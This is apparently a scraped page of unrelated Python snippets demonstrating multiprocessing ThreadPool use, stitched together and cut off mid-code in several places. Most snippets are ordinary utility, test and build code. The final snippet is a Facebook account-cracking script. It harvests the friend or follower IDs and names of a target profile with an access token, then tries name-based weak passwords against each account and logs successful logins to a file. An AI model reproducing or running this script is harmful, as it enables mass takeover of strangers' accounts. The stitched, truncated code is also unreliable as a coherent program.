def run_command(self, command, *args, **opts):
        if len(self.members) <= 0:
            raise TomcatError("Cluster has no members")
        hosts = opts.setdefault('hosts', self.members.keys())
        threads = opts.setdefault('threads',
                      min(self.member_count(), self.max_threads))
        abort_on_error = opts.setdefault('abort_on_error', False)
        if abort_on_error:
            abort = Value('b', 0)

        def run_cmd(host):
            try:
                if abort_on_error and abort.value:
                    raise TomcatError('Aborted')
                self.log.debug("Performing %s%s on %s", command, args, host)
                self._run_progress_callback(event=events.CMD_START,
                        command=command, args=args, node=host)

                rv = getattr(self.members[host], command)(*args)

                self._run_progress_callback(event=events.CMD_END,
                        command=command, args=args, node=host)
            except Exception as e:
                if abort_on_error:
                    abort.value = True
                rv = e
            return (host, rv)

        pool = ThreadPool(processes=threads)
        return ClusterCommandResults(pool.map(run_cmd, hosts))
    def run(self):
        """

        :return:
        """

        kind = self.options.get("PaE.cores", "thread")
        if kind == "thread":
            from multiprocessing.pool import ThreadPool as Pool
        elif kind == "process":
            from multiprocessing import Pool
        else:
            log.fatal('You selected an unknown threading method: %s. Only "thread" or "process" are supported' % kind)
            return self._memory

        import multiprocessing

        max_threads = self.options.get("PaE.cores", multiprocessing.cpu_count())
        pool = Pool(max_threads)

        buckets = self._prepare()

        for b in buckets:
            updates = pool.map(self.execute_node, b)
            for update in updates:
                self._memory.update(update)
Exemple #3
0
def get_pokemons(initial_latitude, initial_longitude):
    full_path = os.path.realpath(__file__)
    (path, filename) = os.path.split(full_path)
    latitude, longitude = initial_latitude, initial_longitude
    args = get_args()
    if args.auto_refresh:
        global auto_refresh
        auto_refresh = int(args.auto_refresh) * 1000

    if args.ampm_clock:
        global is_ampm_clock
        is_ampm_clock = True

    pokemonsJSON = json.load(
        open(path + '/locales/pokemon.' + args.locale + '.json'))

    steplimit = int(args.step_limit)

    pool = ThreadPool(processes=1)
    results = []
    pokemons = {}

    async_result = pool.apply_async(process_step, (pokemonsJSON, latitude, longitude))
    results.append(async_result)

    pokemons.update(results[0].get())

    return pokemons
Exemple #4
0
    def copytree_and_gzip(self, source_dir, target_dir):
        """
        Copies the provided source directory to the provided target directory.

        Gzips JavaScript, CSS and HTML and other files along the way.
        """
        # Figure out what we're building...
        build_list = []
        # Walk through the source directory...
        for (dirpath, dirnames, filenames) in os.walk(source_dir):
            for f in filenames:
                # Figure out what is going where
                source_path = os.path.join(dirpath, f)
                rel_path = os.path.relpath(dirpath, source_dir)
                target_path = os.path.join(target_dir, rel_path, f)
                # Add it to our list to build
                build_list.append((source_path, target_path))

        logger.debug("Gzipping {} files".format(len(build_list)))

        # Build em all
        if not getattr(self, 'pooling', False):
            [self.copyfile_and_gzip(*u) for u in build_list]
        else:
            cpu_count = multiprocessing.cpu_count()
            logger.debug("Pooling build on {} CPUs".format(cpu_count))
            pool = ThreadPool(processes=cpu_count)
            pool.map(self.pooled_copyfile_and_gzip, build_list)
Exemple #5
0
 def test_threadsafe(self):
     # Ensure that the eventdb is thread-safe by hammering on it with
     # multiple threads simultaneously. We should only get one positive.
     pool = ThreadPool(10)
     results = pool.map(self.event_db.check_event, repeat(self.event, 1000))
     self.assertEqual(results.count(True), 1)
     self.assertEqual(results.count(False), 999)
Exemple #6
0
def run_using_threadpool(fn_to_execute, inputs, pool_size):
  """For internal use only; no backwards-compatibility guarantees.

  Runs the given function on given inputs using a thread pool.

  Args:
    fn_to_execute: Function to execute
    inputs: Inputs on which given function will be executed in parallel.
    pool_size: Size of thread pool.
  Returns:
    Results retrieved after executing the given function on given inputs.
  """

  # ThreadPool crashes in old versions of Python (< 2.7.5) if created
  # from a child thread. (http://bugs.python.org/issue10015)
  if not hasattr(threading.current_thread(), '_children'):
    threading.current_thread()._children = weakref.WeakKeyDictionary()
  pool = ThreadPool(min(pool_size, len(inputs)))
  try:
    # We record and reset logging level here since 'apitools' library Beam
    # depends on updates the logging level when used with a threadpool -
    # https://github.com/google/apitools/issues/141
    # TODO: Remove this once above issue in 'apitools' is fixed.
    old_level = logging.getLogger().level
    return pool.map(fn_to_execute, inputs)
  finally:
    pool.terminate()
    logging.getLogger().setLevel(old_level)
	def _test_monitor_tables_locking_errors(self):
		"""Test that intensive read/write operations to the MySQL Monitor tables
		do not trigger locking errors.

		This test will be successful if there will be no generated error at
		the end.
		"""

		# Setting these variables will cause the Monitor to connect more
		# frequently to the backend hosts to check their health, thus increasing
		# the probability of locking errors to appear.
		self.run_query_proxysql_admin("UPDATE global_variables SET variable_value=100 WHERE variable_name='mysql-monitor_connect_interval'")
		self.run_query_proxysql_admin("UPDATE global_variables SET variable_value=100 WHERE variable_name='mysql-monitor_ping_interval'")
		self.run_query_proxysql_admin("LOAD MYSQL VARIABLES TO RUNTIME")

		queries = []
		q1 = "select * from monitor.mysql_server_connect_log ORDER BY RANDOM() LIMIT 10"
		q2 = "select * from monitor.mysql_server_ping_log ORDER BY RANDOM() LIMIT 10"
		for _ in xrange(10000):
			queries.append(random.choice([q1, q2]))

		pool = ThreadPool(processes=5)
		pool.map(self.run_query_proxysql_admin, queries)

		# If we reached this point without an error, it means that the test
		# has passed.
		self.assertEqual(1, 1)
Exemple #8
0
def get_available_google_ips(seeds, threads=None, max=None):
    global print_progress
    threads = threads if threads else (500 if monkey else 10)
    max = max if max else 50
    print_progress = print_progress_builder(max)
    gen = random_ip_generator(seeds)
    pool = ThreadPool(processes=threads)
    available_ips = []
    ips  = set()
    emptyCount = 0
    while len(available_ips) <= max:
        latent_ips = [gen.next() for _ in range(threads)]
        print '%s' % latent_ips
        latent_ips=set(latent_ips).difference(ips);
        print '%s' % latent_ips
        if not latent_ips :
           print "emptyCount:%s" % emptyCount
           if emptyCount > 1 :
             break
           emptyCount += 1
           continue
        results = pool.map(ping, latent_ips)
        for ip, dt in results:
            if dt > 0:
                if ip in ips:
                    continue;
                available_ips.append((ip, dt))
            ips.add(ip)
    sorted_ips = map(lambda x: x[0], 
                     sorted(available_ips, 
                            lambda (_, a), (__, b): bi_value(a-b)))
def fetch_plugins(old_index):
    ans = {}
    pool = ThreadPool(processes=10)
    entries = tuple(parse_index())
    result = pool.map(partial(parallel_fetch, old_index), entries)
    for entry, plugin in zip(entries, result):
        if isinstance(plugin, dict):
            ans[entry.name] = plugin
        else:
            if entry.name in old_index:
                ans[entry.name] = old_index[entry.name]
            log('Failed to get plugin', entry.name, 'at', datetime.utcnow().isoformat(), 'with error:')
            log(plugin)
    # Move staged files
    for plugin in ans.itervalues():
        if plugin['file'].startswith('staging_'):
            src = plugin['file']
            plugin['file'] = src.partition('_')[-1]
            os.rename(src, plugin['file'])
    raw = bz2.compress(json.dumps(ans, sort_keys=True, indent=4, separators=(',', ': ')))
    atomic_write(raw, PLUGINS)
    # Cleanup any extra .zip files
    all_plugin_files = {p['file'] for p in ans.itervalues()}
    extra = set(glob.glob('*.zip')) - all_plugin_files
    for x in extra:
        os.unlink(x)
    return ans
Exemple #10
0
def show_video_stats(options):
    #video_page_urls = get_video_page_urls()
    #for video_page_url in video_page_urls:
    #    print get_video_data(video_page_url)
    pool = Pool(options.workers)
    video_page_urls = get_video_page_urls()
    results = sorted(pool.map(get_video_data, video_page_urls), key=lambda video: video[options.sort],
                     reverse=True)
    print len(results)
    max = options.max
    if max is None or max > len(results):
        max = len(results)
    if options.csv:
        print(u'"title","speakers", "views","likes","dislikes"')
    else:
        print(u'Views  +1  -1 Title (Speakers)')
    for i in range(max):
        if options.csv:
            print(u'"{0}","{1}",{2},{3},{4}'.format(
                results[i]['title'], ', '.join(results[i]['speakers']), results[i]['views'],
                results[i]['likes'], results[i]['dislikes']))
        else:
            print(u'{0:5d} {1:3d} {2:3d} {3} ({4})'.format(
                results[i]['views'], results[i]['likes'], results[i]['dislikes'], results[i]['title'],
                ', '.join(results[i]['speakers'])))
Exemple #11
0
    def __init__(self):
        super(Foo,self).__init__(400,400)
        l = pyglet.text.Label('FOOBAR',font_name="Courier Sans",font_size=20,x=self.width//2,y=self.height//2,multiline=True,width=200)


        pool = ThreadPool(processes=1)
        self.r = pool.apply_async(foo)


        @self.event
        def on_key_press(s,m):
            if s == pyglet.window.key.C:
                print("EXTERNAL")
                l.text = self.r.get()


        @self.event
        def on_draw():
            self.clear()
            
            l.draw()
            count = 10
            offset =(2*pi)/ 10.0
            for i in range(count):
                line((200,200),(200+cos(offset*i)*100,200+sin(offset*i)*100))

        pyglet.app.run()
    def testParallelTableUploadAndDownloadTunnel(self):
        p = 'ds=test'

        table, data = self._gen_table(partition=p.split('=', 1)[0], partition_type='string',
                                      partition_val=p.split('=', 1)[1])
        self.assertTrue(table.exist_partition(p))
        records = [table.new_record(values=d) for d in data]

        n_blocks = 5
        blocks = list(range(n_blocks))
        n_threads = 2
        thread_pool = ThreadPool(n_threads)

        def gen_block_records(block_id):
            c = len(data)
            st = int(c / n_blocks * block_id)
            if block_id < n_blocks - 1:
                ed = int(c / n_blocks * (block_id + 1))
            else:
                ed = c
            return records[st: ed]

        def write(w):
            def inner(arg):
                idx, r = arg
                w.write(idx, r)
            return inner

        with table.open_writer(partition=p, blocks=blocks) as writer:
            thread_pool.map(write(writer), [(i, gen_block_records(i)) for i in blocks])

        for step in range(1, 4):
            reads = []
            expected = []

            with table.open_reader(partition=p) as reader:
                count = reader.count

                for i in range(n_blocks):
                    start = int(count / n_blocks * i)
                    if i < n_blocks - 1:
                        end = int(count / n_blocks * (i + 1))
                    else:
                        end = count
                    for record in reader[start:end:step]:
                        reads.append(record)
                    expected.extend(data[start:end:step])

            self.assertEqual(len(expected), len(reads))
            for val1, val2 in zip(expected, [r.values for r in reads]):
                for it1, it2 in zip(val1[:-1], val2[:-1]):
                    if isinstance(it1, dict):
                        self.assertEqual(len(it1), len(it2))
                        self.assertTrue(any(it1[k] == it2[k] for k in it1))
                    elif isinstance(it1, list):
                        self.assertSequenceEqual(it1, it2)
                    else:
                        self.assertEqual(it1, it2)

        table.drop()
Exemple #13
0
    def _fit(self, dataset):
        est = self.getOrDefault(self.estimator)
        epm = self.getOrDefault(self.estimatorParamMaps)
        numModels = len(epm)
        eva = self.getOrDefault(self.evaluator)
        tRatio = self.getOrDefault(self.trainRatio)
        seed = self.getOrDefault(self.seed)
        randCol = self.uid + "_rand"
        df = dataset.select("*", rand(seed).alias(randCol))
        condition = (df[randCol] >= tRatio)
        validation = df.filter(condition).cache()
        train = df.filter(~condition).cache()

        def singleTrain(paramMap):
            model = est.fit(train, paramMap)
            metric = eva.evaluate(model.transform(validation, paramMap))
            return metric

        pool = ThreadPool(processes=min(self.getParallelism(), numModels))
        metrics = pool.map(singleTrain, epm)
        train.unpersist()
        validation.unpersist()

        if eva.isLargerBetter():
            bestIndex = np.argmax(metrics)
        else:
            bestIndex = np.argmin(metrics)
        bestModel = est.fit(dataset, epm[bestIndex])
        return self._copyValues(TrainValidationSplitModel(bestModel, metrics))
  def collect_logs(self):
    """Collect all the microservice log files."""
    log_dir = os.path.join(self.options.log_dir, 'service_logs')
    if not os.path.exists(log_dir):
      os.makedirs(log_dir)

    def fetch_service_log(service):
      try:
        logging.debug('Fetching logs for "%s"...', service)
        deployer = (self if service in HALYARD_SERVICES
                    else self.__spinnaker_deployer)
        deployer.do_fetch_service_log_file(service, log_dir)
      except Exception as ex:
        message = 'Error fetching log for service "{service}": {ex}'.format(
            service=service, ex=ex)
        if ex.message.find('No such file') >= 0:
          message += '\n    Perhaps the service never started.'
          # dont log since the error was already captured.
        else:
          logging.error(message)
          message += '\n{trace}'.format(
              trace=traceback.format_exc())

        write_data_to_secure_path(
            message, os.path.join(log_dir, service + '.log'))

    logging.info('Collecting server log files into "%s"', log_dir)
    all_services = list(SPINNAKER_SERVICES)
    all_services.extend(HALYARD_SERVICES)
    thread_pool = ThreadPool(len(all_services))
    thread_pool.map(fetch_service_log, all_services)
    thread_pool.terminate()
Exemple #15
0
def analyze_commits(project_name, target_repo, existing_target_branches, fork_list):
    print 'Analyzing commits'

    pool = ThreadPool(processes=10)

    existing_target_commits = []

    for fork_repo in fork_list:
        for target_branch in existing_target_branches:

            print '    Analyzing %s (branch: %s) ' % (fork_repo.full_name, target_branch),
            fork_repo_commits = fork_repo.get_commits(sha=target_branch)

            max_commits_to_analyze = 30
            analyzed_commits = 0

            fork_commits_to_analyze = []

            for fork_comm in fork_repo_commits:
                if analyzed_commits == max_commits_to_analyze:
                    break

                fork_commits_to_analyze.append(fork_comm)

                analyzed_commits += 1

            partial_c_in_root = functools.partial(commit_is_in_root,
                                                  existing_target_commits,
                                                  target_repo, fork_repo)

            pool.map(partial_c_in_root, fork_commits_to_analyze)
            print
Exemple #16
0
    def search(self,button):
        print 'search clicked'
        self.popup_menu=Gtk.Menu()
        s=self.search_field.get_text()
        if s:
            #thread.start_new_thread(scrape_test.main,(s,))
            pool = ThreadPool(processes=1)
            async_result = pool.apply_async(scrape_test.main, (s,)) # tuple of args for foo
            self.href, title, size, seeders, leechers= async_result.get() 
            self.popup_menu.set_title("Torrents")
            print self.popup_menu.get_title()
            for i in range(len(self.href)):
                #print str(i+1)+'. '+title[i]+' '+size[i]+' '+seeders[i]+' '+leechers[i]
                menu_item = Gtk.MenuItem(str(i+1)+'. '+title[i]+'     '+size[i]+' '+seeders[i]+'-SEEDERS '+leechers[i]+'-LEECHERS')
                menu_item.connect("activate",self.item_activated,i)
                self.popup_menu.append(menu_item)
            self.popup_menu.show_all()
            self.popup_menu.popup(None, None, None, None, 0, Gtk.get_current_event_time())

        else:
            print 'EMPTY'
            self.label.set_text("Search field is empty")
            #self.dialog=self.builder.get_object('dialog1')
            v=self.dialog.run()
            if v==1:
                self.dialog.hide()
Exemple #17
0
	def StartInfrastructure(inf_id, auth):
		"""
		Start all virtual machines in an infrastructure previously stopped.

		Args:

		- inf_id(str): infrastructure id.
		- auth(Authentication): parsed authentication tokens.

		Return(str): error messages; empty string means all was ok.
		"""

		InfrastructureManager.logger.info("Starting the infrastructure id: " + str(inf_id))

		sel_inf = InfrastructureManager.get_infrastructure(inf_id, auth)
		exceptions = []
		if Config.MAX_SIMULTANEOUS_LAUNCHES > 1:
			pool = ThreadPool(processes=Config.MAX_SIMULTANEOUS_LAUNCHES)
			pool.map(
				lambda vm: InfrastructureManager._start_vm(vm, auth, exceptions), 
				reversed(sel_inf.get_vm_list())
				)
		else:
			for vm in sel_inf.get_vm_list():
				InfrastructureManager._start_vm(vm, auth, exceptions)

		if exceptions:
			msg = ""
			for e in exceptions:
				msg += str(e) + "\n"
			raise Exception("Error starting the infrastructure: %s" % msg)

		InfrastructureManager.logger.info("Infrastructure successfully restarted")
		return ""
    def handle_noargs(self, **options):
        mimetypes.init()

        locked_print("===> Syncing static directory")
        pool = ThreadPool(20)

        # Sync every file in the static media dir with S3
        def pooled_sync_file(base, filename):
            pool.apply_async(self.sync_file, args=[base, filename])

        self.walk_tree([conf.SIMPLESTATIC_DIR], pooled_sync_file)
        pool.close()
        pool.join()
        locked_print("===> Static directory syncing complete")

        locked_print("===> Compressing and uploading CSS and JS")
        pool = ThreadPool(20)

        # Iterate over every template, looking for SimpleStaticNode
        def pooled_handle_template(base, filename):
            pool.apply_async(self.handle_template, args=[base, filename])

        self.walk_tree(list(settings.TEMPLATE_DIRS), pooled_handle_template)
        pool.close()
        pool.join()
        locked_print("===> Finished compressing and uploading CSS and JS")
Exemple #19
0
def svnup(site, commitmessage):
    svn = Popen(['svn', 'status'], cwd=site['localdir'], stdout=PIPE, stderr=PIPE)
    
    
    files = []
    for line in svn.stdout.readlines():
        lineprefix = 'A  +    '
        
        if line.startswith('M') or line.startswith('A'):
            line = line[len(lineprefix):]
            line = line.rstrip('\r').rstrip('\n')
            files.append(line)
        elif (line.startswith('?') 
              or line.startswith('C') 
              or line.startswith('!')):
            call(['svn', 'status'], cwd=site['localdir'])
            exit(1)

    if len(files):
        print 'Uploading: ', '\n'.join(files)
    else:
        print 'Nothing to Update'
        call(['svn', 'status'], cwd=site['localdir'])
        exit(0)
    
    stdout, stderr = svn.communicate()
    
    if stderr:
        print stderr
        exit(1)
    
    def upload(filename):
        remotefilename = path.join(site['remotedir'], filename)
        remoteaddress = 'ftp://%s%s' % (site['host'], remotefilename)
        
        if not path.isdir(filename):
            print 'Uploading: \n', filename
            exitcode = call(['curl',
                  '--progress-bar',
                  '-T', filename, 
                  '--ftp-create-dirs',
                  '--user', '%s:%s' % (site['username'], site['password']),
                  remoteaddress],
                  cwd = site['localdir'])
            
            print ''
            if exitcode:
                print 'Error in uploading "%s"' % filename
                print 'Destenation is "%s"' % remoteaddress
                exit(1)
    
    pool = ThreadPool(settings['concurrentConnections'])
    pool.map(upload, files)
    
    
    for filename in files:
        upload(filename)

    
    call(['svn', 'commit', '-m', commitmessage], cwd=site['localdir'])
	def read(self, sftppath, localPath = None, numParallelConnections = 1):
		if localPath is None:
			localPath = os.getcwd() # local path - can be changed later
		sftp = paramiko.SFTPClient.from_transport(self.transport)
		if (numParallelConnections > 1):
			pool = ThreadPool(numParallelConnections)

		def getFile(sftppath, localpath):
			pconnection = SFTPConnection(self.connectionInfo)
			pconnection.connect()
			psftp = paramiko.SFTPClient.from_transport(pconnection.transport)
			psftp.get(sftppath, localpath)
			psftp.close()
			pconnection.close()

		def recursiveRead(sftp, sftppath, localPath):
			fileattr = sftp.lstat(sftppath)
			if not stat.S_ISDIR(fileattr.st_mode): #it is a file
				if (numParallelConnections > 1):
					pool.apply_async(getFile, args= (sftppath, os.path.join(localPath, os.path.basename(sftppath))))
				else:
					sftp.get(sftppath, os.path.join(localPath, os.path.basename(sftppath)))
			else: #it is a directory
				try: #creating local directory, using try-catch to handle race conditions
					os.makedirs(os.path.join(localPath, os.path.basename(sftppath)))
				except OSError as exception:
					if exception.errno != errno.EEXIST:
						raise
				for file in sftp.listdir_attr(sftppath):
					recursiveRead(sftp, os.path.join(sftppath, file.filename), os.path.join(localPath, os.path.basename(sftppath)))
		recursiveRead(sftp, sftppath, localPath)
		sftp.close()
		if (numParallelConnections > 1):
			pool.close()
			pool.join()
Exemple #21
0
    def monitorthread(self):
        stock_codes = []
        for item in self.conn.mystock.todaydata.find():

            stock_codes.append(item['code'])
        pool = ThreadPool(40)
        pool.map(self.proxy, stock_codes)
Exemple #22
0
  def run_test_case_list(
      self, test_case_list, max_concurrent, timeout_ok=False,
      max_retries=0, retry_interval_secs=5, full_trace=False):
    """Run a list of test cases.

    Args:
      test_case_list: [list of OperationContract] Specifies the tests to run.
      max_concurrent: [int] The number of cases that can be run concurrently.
      timeout_ok: [bool] If True then individual tests can timeout and still
         be considered having a successful AgentOperationStatus.
      max_retries: [int] Number of independent retries permitted on
         individual operations if the operation status fails. A value of 0
         indicates that a test should only be given a single attempt.
      retry_interval_secs: [int] Time between retries of individual operations.
      full_trace: [bool] If True then provide detailed execution tracing.
    """
    num_threads = min(max_concurrent, len(test_case_list))
    pool = ThreadPool(processes=num_threads)
    def run_one(test_case):
      """Helper function to run individual tests."""
      self.run_test_case(
          test_case=test_case, timeout_ok=timeout_ok,
          max_retries=max_retries, retry_interval_secs=retry_interval_secs,
          full_trace=full_trace)

    self.logger.info(
        'Running %d tests across %d threads.',
        len(test_case_list), num_threads)
    pool.map(run_one, test_case_list)
    self.logger.info('Finished %d tests.', len(test_case_list))
Exemple #23
0
def bench_compression_comparison(n_chunks, df_length, append_mul, pool_size, pool_step, repeats,
                                 use_raw_lz4, use_HC):
    _str = construct_test_data(df_length, append_mul)
    chunk_size = len(_str) / 1024 ** 2.0
    _strarr = [_str] * n_chunks

    # Single threaded
    # ---------------
    measurements = bench_single(repeats, _strarr, use_HC)
    print_results(1, chunk_size, n_chunks, chunk_size*n_chunks, measurements)
    single_mean = np.mean(measurements)

    # Multi-threaded
    # --------------
    for sz in range(2, pool_size + 1, pool_step):
        if use_raw_lz4:
            pool = ThreadPool(sz)
        else:
            pool = None
            c.set_compression_pool_size(sz)
        measurements = bench_multi(repeats, _strarr, use_HC, pool=pool)
        print_results(sz, chunk_size, n_chunks, chunk_size * n_chunks, measurements, compare=single_mean)
        if pool:
            pool.close()
            pool.join()
    print("")
    def extract(url):
        """TODO: Docstring for extract.
        :returns: TODO

        """
        try:
            r = rs.get(url)
            soup = bs(r.text, 'html.parser')
            tr_list = soup.tbody.find_all('tr')
        except AttributeError:
            print r
            return None
        info_list = []
        for tr in tr_list:
            td_list = tr.find_all('td')
            if td_list[2].text.strip() == u'高匿名' and\
                    'HTTP' in td_list[3].text.strip(' ').split(',') and\
                    'GET' in td_list[4].text.strip(' ').split(','):
                infos = list()
                infos.append(td_list[0].text.strip())
                infos.append(td_list[1].text.strip())
                infos.append(td_list[6].text.strip()[:-1])
                if td_list[7].text.find(u'小时') != -1:
                    infos.append(float(td_list[7].text[:-3]) * 3600)
                else:
                    infos.append(float(td_list[7].text[:-3]) * 60)
                info_list.append(infos)
        p = Pool(len(info_list))
        proxy_list = p.map(wrapper, info_list)
        p.close()
        return proxy_list
def retrieve_html_exercises(exercises: [str], lang: str, force=False) -> (str, [str]):
    """
    Return a 2-tuple with the first element pointing to the path the exercise files are stored,
    and the second element a list of exercise ids that have html exercises.
    """
    BUILD_DIR = os.path.join(os.getcwd(), "build", lang)
    EN_BUILD_DIR = os.path.join(os.getcwd(), "build", "en")
    EXERCISE_DOWNLOAD_URL_TEMPLATE = ("https://es.khanacademy.org/"
                                      "khan-exercises/exercises/{id}.html?lang={lang}")

    def _download_html_exercise(exercise_id):
        """
        Download an exercise and return its exercise id *if* the
        downloaded url from the selected language is different from the english version.
        """
        lang_url = EXERCISE_DOWNLOAD_URL_TEMPLATE.format(id=exercise_id, lang=lang)
        en_url = EXERCISE_DOWNLOAD_URL_TEMPLATE.format(id=exercise_id, lang="en")
        try:
            lang_file = download_and_cache_file(lang_url, cachedir=BUILD_DIR, ignorecache=force)
            en_file = download_and_cache_file(en_url, cachedir=EN_BUILD_DIR, ignorecache=force)
            if not filecmp.cmp(lang_file, en_file, shallow=False):
                return exercise_id
        except urllib.error.HTTPError:
            return None

    pool = Pool(processes=NUM_PROCESSES)
    translated_exercises = pool.map(_download_html_exercise, exercises)
    # filter out Nones, since it means we got an error downloading those exercises
    result = [e for e in translated_exercises if e]
    return (BUILD_DIR, result)
Exemple #26
0
    def _load_lyrics(self, songdict):
        total = []
        for songlist in songdict.values():
            total += songlist

        pool = ThreadPool()
        pool.map(Song.load, total)
Exemple #27
0
def generate_my_keys(the_n, the_e, the_d):
    pool = ThreadPool(processes=1)

    async_result = pool.apply_async(newKey, (the_n, the_e, the_d))  # tuple of args for foo

    (n, e, d) = async_result.get()  # get the return value from your function.
    return (n, e, d)
    def _test_herd_management(self, cache):
        globals()['call_count'] = 0

        def test_callable(v):
            global call_count
            call_count += 1

            sleep(0.1)
            return v

        pool = ThreadPool(processes=10)
        processes = []
        for _ in xrange(10):
            to_func = {
                'key': self._test_key,
                'callback': test_callable,
                'callback_params': {'v': 17},
            }

            async_result = pool.apply_async(
                cache.get_or_set, kwds=to_func
            )
            processes.append(async_result)

        results = []
        for thread in processes:
            thread.wait()
            results.append(thread.get())

        # Checking that callable method was applied only once
        self.assertEqual(globals()['call_count'], 1)

        # Checking results - they all should be the same
        self.assertEqual(results, [17] * 10)
Exemple #29
0
def resolve_playlist(url):
    resolve_pool = ThreadPool(processes=16)
    logger.info("Resolving YouTube-Playlist '%s'", url)
    playlist = []

    page = 'first'
    while page:
        params = {
            'playlistId': url,
            'maxResults': 50,
            'key': yt_key,
            'part': 'contentDetails'
        }
        if page and page != "first":
            logger.debug("Get YouTube-Playlist '%s' page %s", url, page)
            params['pageToken'] = page

        result = session.get(yt_api_endpoint+'playlistItems', params=params)
        data = result.json()
        page = data.get('nextPageToken')

        for item in data["items"]:
            video_id = item['contentDetails']['videoId']
            playlist.append(video_id)

    playlist = resolve_pool.map(resolve_url, playlist)
    resolve_pool.close()
    return [item for item in playlist if item]
def test(my_test_cases):
    try:
        logfile = edex_tools.find_latest_log()
    except OSError as e:
        log.error('Error fetching latest log file - %s', e)
        return {}

    total_timeout = 0
    count = 0
    sc = {}
    pool = ThreadPool(MAX_THREADS)

    pool.map(execute_test, my_test_cases)

    for tc in my_test_cases:
        total_timeout += tc.timeout
        count += tc.count

    # wait for all ingestion to complete
    if not edex_tools.watch_log_for('EDEX - Ingest complete for file', logfile=logfile,
                                    expected_count=count, timeout=total_timeout):
        log.error('Timed out waiting for ingest complete message')

    log.info('All files ingested, testing results')

    for tc in pool.map(evaluate_test_case, test_cases):
        sc.update(tc)

    return sc
Exemple #31
0
def l_menu_select():
    select = raw_input('\nChoose Option >>> ')
    id = []
    oks = []
    cps = []
    if select == '1':
        os.system('clear')
        logo()
        print ''
        os.system('echo -e "\t    Public ID Cloning " | lolcat')
        print ''
        idt = raw_input(' Put Id/user :  '******'clear')
        logo()
        print ''
        os.system('echo -e "\t    Gathering Information " | lolcat')
        print ''
        try:
            r = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + token)
            q = json.loads(r.text)
            os.system('clear')
            logo()
            print ''
            os.system('echo -e "\t    Public ID Cloning " | lolcat')
            print ''
            print ' Target user : '******'name']
        except (KeyError, IOError):
            print ''
            print '\n\t    \x1b[1;31m Logged in id has checkpoint\x1b[0;97m'
            print ''
            raw_input('\nPress enter to back ')
            l_menu()

        r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + token)
        z = json.loads(r.text)
        for i in z['data']:
            uid = i['id']
            na = i['name']
            nm = na.rsplit(' ')[0]
            id.append(uid + '|' + nm)

    elif select == '2':
        os.system('clear')
        logo()
        print ''
        os.system('echo -e "\t    Public ID Cloning " | lolcat')
        print ''
        idt = raw_input(' Put Id/user : '******'clear')
        logo()
        print ''
        os.system('echo -e "\t    Gathering Information " | lolcat')
        print ''
        try:
            r = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + token, headers=header)
            q = json.loads(r.text)
            os.system('clear')
            logo()
            print ''
            os.system('echo -e "\t    Followers Cloning " | lolcat')
            print ''
            print ' Target user : '******'name']
        except (KeyError, IOError):
            print ''
            print '\n\t    \x1b[1;31m Logged in id has checkpoint\x1b[0;97m'
            print ''
            raw_input('\n Press enter to back ')
            l_menu()

        r = requests.get('https://graph.facebook.com/' + idt + '/subscribers?access_token=' + token + '&limit=5000', headers=header)
        z = json.loads(r.text)
        for i in z['data']:
            uid = i['id']
            na = i['name']
            nm = na.rsplit(' ')[0]
            id.append(uid + '|' + nm)

    elif select == '3':
        method_menu()
    elif select == '4':
        logout()
    else:
        print ''
        print '\t    ' + c + 'Select valid method' + c2
        print ''
        l_menu_select()
    print ' Total IDs : ' + str(len(id))
    time.sleep(0.5)
    print ' The process is running in background'
    print ''
    print 47 * '-'
    print ''

    def main(arg):
        user = arg
        uid, name = user.split('|')
        try:
            pass1 = name + '123'
            data = requests.get('http://mbasic.facebook.com/localhost:5000/auth?id=' + uid + '&pass='******'loc' in q:
                print '\x1b[1;32m[Successful] \x1b[1;30m' + uid + ' | ' + pass1 + '\x1b[0;97m'
                ok = open('ok.txt', 'a')
                ok.write(uid + ' | ' + pass1 + '\n')
                ok.close()
                oks.append(uid + pass1)
            elif 'www.facebook.com' in q['error']:
                print '[Checkpoint] ' + uid + ' | ' + pass1
                cp = open('cp.txt', 'a')
                cp.write(uid + ' | ' + pass1 + '\n')
                cp.close()
                cps.append(uid + pass1)
            else:
                pass2 = name + '1234'
                data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass='******'loc' in q:
                    print '\x1b[1;32m[Successful] \x1b[1;30m' + uid + ' | ' + pass2 + '\x1b[0;97m'
                    ok = open('ok.txt', 'a')
                    ok.write(uid + ' | ' + pass2 + '\n')
                    ok.close()
                    oks.append(uid + pass2)
                elif 'www.facebook.com' in q['error']:
                    print '[Checkpoint] ' + uid + ' | ' + pass2
                    cp = open('cp.txt', 'a')
                    cp.write(uid + ' | ' + pass2 + '\n')
                    cp.close()
                    cps.append(uid + pass2)
                else:
                    pass3 = name + '12345'
                    data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass='******'loc' in q:
                        print '\x1b[1;32m[Successful] \x1b[1;30m' + uid + ' | ' + pass3 + '\x1b[0;97m'
                        ok = open('ok.txt', 'a')
                        ok.write(uid + ' | ' + pass3 + '\n')
                        ok.close()
                        oks.append(uid + pass3)
                    elif 'www.facebook.com' in q['error']:
                        print '[Checkpoint] ' + uid + ' | ' + pass3
                        cp = open('cp.txt', 'a')
                        cp.write(uid + ' | ' + pass3 + '\n')
                        cp.close()
                        cps.append(uid + pass3)
                    else:
                        pass4 = name + '786'
                        data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass='******'loc' in q:
                            print '\x1b[1;32m[Successful] \x1b[1;30m' + uid + ' | ' + pass4 + '\x1b[0;97m'
                            ok = open('ok.txt', 'a')
                            ok.write(uid + ' | ' + pass4 + '\n')
                            ok.close()
                            oks.append(uid + pass4)
                        elif 'www.facebook.com' in q['error']:
                            print '[Checkpoint] ' + uid + ' | ' + pass4
                            cp = open('cp.txt', 'a')
                            cp.write(uid + ' | ' + pass4 + '\n')
                            cp.close()
                            cps.apppend(uid + pass4)
                        else:
                            pass5 = '786786'
                            data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass='******'loc' in q:
                                print '\x1b[1;32m[Successful] \x1b[1;30m' + uid + ' | ' + pass5 + '\x1b[0;97m'
                                ok = open('ok.txt', 'a')
                                ok.write(uid + ' | ' + pass5 + '\n')
                                ok.close()
                                oks.append(uid + pass5)
                            elif 'www.facebook.com' in q['error']:
                                print '[Checkpoint] ' + uid + ' | ' + pass5
                                cp = open('cp.txt', 'a')
                                cp.write(uid + ' | ' + pass5 + '\n')
                                cp.close()
                                cps.append(uid + pass5)
                            else:
                                pass6 = '786000'
